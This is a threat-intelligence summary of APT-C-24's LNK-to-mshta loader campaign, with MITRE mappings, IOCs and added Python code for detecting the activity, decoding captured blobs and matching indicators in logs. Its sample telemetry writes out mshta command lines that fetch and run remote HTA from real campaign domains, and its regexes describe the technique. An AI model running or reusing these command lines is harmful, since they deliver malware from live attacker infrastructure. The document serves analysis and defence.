APT-C-24 Shortcut-Delivered Obfuscated Loader

APT-C-24 (响尾蛇) uses malicious LNK files inside zip archives to deliver MSHTA-executed obfuscated HTA/JS scripts that memory-load C# loaders and remote payloads, targeting government, military, and energy sectors in South Asia. The campaigns use distinctive URL patterns ending in yui=0/1/2 and domains such as mail163cn.info, with rapid C2 rotation and strong code-obfuscation and evasion techniques. #APT-C-24 #mail163cn.info

Keypoints

  • APT-C-24 (响尾蛇) distributes zip archives containing three LNK shortcuts (e.g., file 1.docx.lnk, file 2.docx.lnk, file 3.docx.lnk) that invoke mshta.exe to load remote HTA/JS scripts.
  • Remote URLs used by LNKs have characteristic endings yui=0, yui=1, yui=2 and often use themed domain substrings (nepal, army, np, lk, aliyumm) to appear legitimate.
  • The HTA/JS scripts are multi-layer obfuscated; they write a disguised file to %TEMP% (e.g., “%TEMP%file 2.docx”), perform Base64 decode and decompression, and conditionally proceed based on environment checks.
  • Environment checks include WMI queries for NumberOfCores and physical memory (>810MB); only targets meeting thresholds will have subsequent payloads decoded and memory-loaded.
  • Observed follow-up component is a heavily obfuscated C# downloader (MD5 2e382c82d055e6e3a5feb9095d759735) that detects security products, reports them via crafted URLs, decodes/opens deception files, and XOR-decrypts remote data for reflective loading.
  • Campaigns show reuse of TTPs and code artifacts across years (similar double-extension .jpg.lnk → .docx.lnk samples, same XOR/keying scheme using first 32 bytes) linking samples to APT-C-24.
  • IOCs include many MD5 hashes and numerous malicious URLs (e.g., policy.mail163cn.info, lk.aliyumm.pro) with rapid C2 turnover, complicating capture of final payloads for non-targets.
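The chain described in the keypoints leaves two cheap telemetry signals: mshta.exe launched with an http(s) URL on its command line, and a double-extension shortcut (.docx.lnk, .jpg.lnk) appearing on disk when the archive is unpacked. The detection logic below is an added example written for this page, not code from the report; the events are constructed Sysmon-style records (only the mail163cn.info and aliyumm.pro hosts and the yui= query come from the page), and the `/<8 digits>-New` path pattern is an assumption inferred from the three URLs the page quotes.

```python
import re
from typing import Dict, List

# Constructed endpoint telemetry (Sysmon-style ProcessCreate / FileCreate events,
# reduced to a few fields). Written for this example, not logs from the report.
# The intranet/vendor lines are benign filler to show the rules do not fire on them.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://policy.mail163cn.info/36287654-New?yui=1'},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://lk.aliyumm.pro/11111111-New?yui=2'},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://intranet.example.test/help.hta'},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Vendor\installer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" C:\Program Files\Vendor\setup.hta'},
    {"EventType": "FileCreate", "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\u\Downloads\file 2.docx.lnk"},
    {"EventType": "FileCreate", "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\u\Downloads\quarterly report.docx"},
]

# mshta.exe handed an http(s) URL: remote HTA/JS execution (T1218 on the page).
REMOTE_URL = re.compile(r"\bhttps?://[^\s\"']+", re.IGNORECASE)
# Query ending yui=0/1/2, as reported on the page.
YUI_QUERY = re.compile(r"[?&]yui=[012]$")
# Assumption: 8-digit path segment followed by "-New", inferred from the quoted URLs.
NEW_PATH = re.compile(r"/\d{8}-New(\?|$)")
# Double-extension shortcuts named on the page: .docx.lnk and .jpg.lnk.
DOUBLE_EXT_LNK = re.compile(r"\.(docx|jpg)\.lnk$", re.IGNORECASE)


def score_event(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules this event triggers (empty when clean)."""
    hits: List[str] = []
    if event["EventType"] == "ProcessCreate" and event["Image"].lower().endswith("\\mshta.exe"):
        url = REMOTE_URL.search(event["CommandLine"])
        if url:
            hits.append("mshta_remote_url")          # generic, medium confidence
            if YUI_QUERY.search(url.group(0)):
                hits.append("aptc24_yui_query")      # campaign-specific trait
            if NEW_PATH.search(url.group(0)):
                hits.append("aptc24_new_path")       # assumed campaign trait
    elif event["EventType"] == "FileCreate":
        if DOUBLE_EXT_LNK.search(event["TargetFilename"]):
            hits.append("double_extension_lnk")
    return hits


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> triggered rules, keeping only events that fired."""
    findings: Dict[int, List[str]] = {}
    for i, event in enumerate(events):
        hits = score_event(event)
        if hits:
            findings[i] = hits
    return findings


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```

The generic `mshta_remote_url` rule is the one to alert on in most environments, since legitimate mshta.exe use almost never involves a remote URL; the two campaign-specific rules only raise confidence and will stop matching once the operators change their URL scheme.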

MITRE Techniques

  • [T1204] User Execution – LNK files are delivered in zip archives and rely on user opening the LNK shortcut to trigger mshta.exe execution of remote HTA/JS (“victim runs ‘file 2.docx.lnk’ which uses mshta.exe to execute HTML file at https[:]//policy.mail163cn.info/36287654-New?yui=1”).
  • [T1218] Signed Binary Proxy Execution (Mshta) – Attack uses mshta.exe to execute remote HTML/JS scripts (“mshta.exe program executes the HTML file located at https[:]//policy.mail163cn.info/36287654-New?yui=1”).
  • [T1059] Command and Scripting Interpreter – Obfuscated JScript/HTA is used to decode, write files to %TEMP% and perform environment checks (“the html file is essentially a jscript carrying encoded obfuscation data” and it writes “%TEMP% file 2.docx”).
  • [T1082] System Information Discovery – WMI queries retrieve processor core count and physical memory to decide whether to load next-stage payload (“SELECT NumberOfCores FROM Win32_Processor” and check if physical memory > 810M).
  • [T1105] Ingress Tool Transfer – The C# loader fetches further data from remote servers (e.g., https[:]//policy.mail163cn.info/08395961-New) and XOR-decrypts it for reflective loading (“reads data from https[:]//policy.mail163cn.info/08395961-New and XOR decrypts then reflectively loads the remote data”).
  • [T1027] Obfuscated Files or Information – Multiple layers of obfuscation and long randomized variable names are used in scripts and .NET payloads to hinder analysis (“scripts are heavily obfuscated; later payloads use long strings to obfuscate variable names and identical decryption algorithm”).
  • [T1210] Exploitation of Remote Services / Rapid C2 Rotation (C2 Evasion) – Use of fast-changing C2 domains and targeted payload delivery limits successful downloads for non-targets (“C2 servers have fast invalidation rotation and only deliver subsequent payloads to victims meeting target conditions”).
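The keypoints and the T1105 entry both describe the final stage as remote data that is XOR-decrypted before reflective loading, keyed on the first 32 bytes. For an analyst who has captured such a blob from a proxy or sandbox, the helper below strips the key, decodes the body and sanity-checks the result for a PE header. This is an added example, not the report's code; the exact layout (leading 32 bytes are the key, applied cyclically to the remainder) is an assumption based on the page's wording, and the key and header-only "payload" used for the round trip are constructed here.

```python
import struct

KEY_LEN = 32  # the page says the scheme keys on the first 32 bytes (layout assumed)

# Constructed 32-byte key for the round-trip demo; not a key from any sample.
CONSTRUCTED_KEY = bytes((i * 37 + 11) & 0xFF for i in range(KEY_LEN))


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key. XOR is symmetric, so this both encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def split_and_decode(blob: bytes, key_len: int = KEY_LEN) -> bytes:
    """Assumed layout: the leading key_len bytes are the key, the rest is the encoded body."""
    if len(blob) <= key_len:
        raise ValueError("blob too short to hold a key and a body")
    key, body = blob[:key_len], blob[key_len:]
    return xor_with_key(body, key)


def looks_like_pe(data: bytes) -> bool:
    """Cheap check on a decoded buffer: MZ signature and 'PE\\0\\0' at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def build_constructed_pe_stub() -> bytes:
    """A 256-byte header-only stand-in for a payload: valid MZ/PE markers, no code at all."""
    hdr = bytearray(0x100)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)  # e_lfanew -> offset 0x80
    hdr[0x80:0x84] = b"PE\0\0"
    return bytes(hdr)


def make_sample_blob() -> bytes:
    """Constructed test fixture: key followed by the XOR-encoded stub."""
    return CONSTRUCTED_KEY + xor_with_key(build_constructed_pe_stub(), CONSTRUCTED_KEY)


def analyze(blob: bytes) -> dict:
    """Decode a captured blob and report whether a PE emerges only after decoding."""
    decoded = split_and_decode(blob)
    return {
        "body_is_pe_before_decode": looks_like_pe(blob[KEY_LEN:]),
        "decoded_is_pe": looks_like_pe(decoded),
        "decoded_len": len(decoded),
    }


if __name__ == "__main__":
    print(analyze(make_sample_blob()))
```

When the decoded buffer passes `looks_like_pe`, hand it to a .NET-aware analysis tool rather than trusting the check itself; the header test only confirms the keying assumption was right for that capture.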

Indicators of Compromise

  • [MD5] Observed malicious binaries and scripts – 14632adccc9620b66ac4a3c52946f8c4 (LNK sample), 2e382c82d055e6e3a5feb9095d759735 (C# downloader), and 35 more hashes.
  • [URL] LNK/HTA hosting and C2 endpoints – https[:]//policy.mail163cn.info/34016917-New?yui=1, https[:]//policy.mail163cn.info/08395961-New, and related domains such as lk.aliyumm.pro and mail163cn.info, the latter resolving to 89.150.45.75.
  • [File name] Deceptive files created or used – “%TEMP%file 2.docx” (disguised content dropped by the HTA), file 2.docx.lnk (LNK sample filename).
  • [Domain/IP] Thematic malicious domains and associated IP – mail163cn.info, mailnepalarmymil.mods.email, lk.aliyumm.pro; mail163cn.info subdomains resolved to 89.150.45.75 in observed samples.
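The IOC list above is defanged (`https[:]//`) and mixes full URLs, bare domains and an IP, so it cannot be compared with log fields as-is. The following added example (written for this page, not part of the report) refangs and buckets the page's own indicators, then matches them against constructed DNS and proxy records; subdomains are matched by suffix so the apex `mail163cn.info` also catches `policy.mail163cn.info`. The sample log records are constructed for the example.

```python
import re
from typing import Dict, List, Set
from urllib.parse import urlparse

# IOCs exactly as the page lists them, in defanged form.
PAGE_IOCS = [
    "https[:]//policy.mail163cn.info/34016917-New?yui=1",
    "https[:]//policy.mail163cn.info/08395961-New",
    "lk.aliyumm.pro",
    "mail163cn.info",
    "mailnepalarmymil.mods.email",
    "89.150.45.75",
]

IPV4 = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")


def refang(value: str) -> str:
    """Undo common defanging so the indicator compares with real log fields."""
    return (value.strip()
            .replace("[:]", ":").replace("[.]", ".").replace("(.)", ".")
            .replace("hxxps://", "https://").replace("hxxp://", "http://"))


def normalize_iocs(raw: List[str]) -> Dict[str, Set[str]]:
    """Bucket indicators into exact URLs, domains (hosts of URLs included) and IPs."""
    out: Dict[str, Set[str]] = {"url": set(), "domain": set(), "ip": set()}
    for item in raw:
        v = refang(item)
        if "://" in v:
            out["url"].add(v)
            host = urlparse(v).hostname
            if host:
                out["domain"].add(host.lower())
        elif IPV4.match(v):
            out["ip"].add(v)
        else:
            out["domain"].add(v.lower().rstrip("."))
    return out


def domain_hit(qname: str, domains: Set[str]) -> str:
    """Return the most specific indicator that equals qname or is a parent of it, else ''."""
    q = qname.lower().rstrip(".")
    for d in sorted(domains, key=len, reverse=True):
        if q == d or q.endswith("." + d):
            return d
    return ""


# Constructed DNS and proxy records for the demo; not from the report.
SAMPLE_LOGS = [
    {"src": "dns", "client": "10.0.0.5", "qname": "policy.mail163cn.info", "answer": "89.150.45.75"},
    {"src": "dns", "client": "10.0.0.8", "qname": "mail.example.test", "answer": "192.0.2.10"},
    {"src": "proxy", "client": "10.0.0.5", "url": "https://policy.mail163cn.info/08395961-New", "dst_ip": "89.150.45.75"},
    {"src": "proxy", "client": "10.0.0.9", "url": "https://cdn.example.test/lib.js", "dst_ip": "198.51.100.7"},
    {"src": "dns", "client": "10.0.0.3", "qname": "lk.aliyumm.pro", "answer": "203.0.113.44"},
]


def match_logs(logs: List[Dict[str, str]], iocs: Dict[str, Set[str]]) -> List[Dict[str, object]]:
    """Return one finding per record that touches an indicator, with the reasons it matched."""
    findings: List[Dict[str, object]] = []
    for rec in logs:
        reasons: List[str] = []
        if rec["src"] == "dns":
            d = domain_hit(rec["qname"], iocs["domain"])
            if d:
                reasons.append(f"domain:{d}")
            if rec["answer"] in iocs["ip"]:
                reasons.append(f"ip:{rec['answer']}")
        elif rec["src"] == "proxy":
            if rec["url"] in iocs["url"]:
                reasons.append("url:exact")
            d = domain_hit(urlparse(rec["url"]).hostname or "", iocs["domain"])
            if d:
                reasons.append(f"domain:{d}")
            if rec["dst_ip"] in iocs["ip"]:
                reasons.append(f"ip:{rec['dst_ip']}")
        if reasons:
            findings.append({"client": rec["client"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in match_logs(SAMPLE_LOGS, normalize_iocs(PAGE_IOCS)):
        print(f)
```

Because the page notes rapid C2 turnover, the domain and IP buckets age quickly; the resolved IP in particular should be treated as a point-in-time indicator and re-checked before being used for blocking.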


Read more: https://www.ctfiot.com/270213.html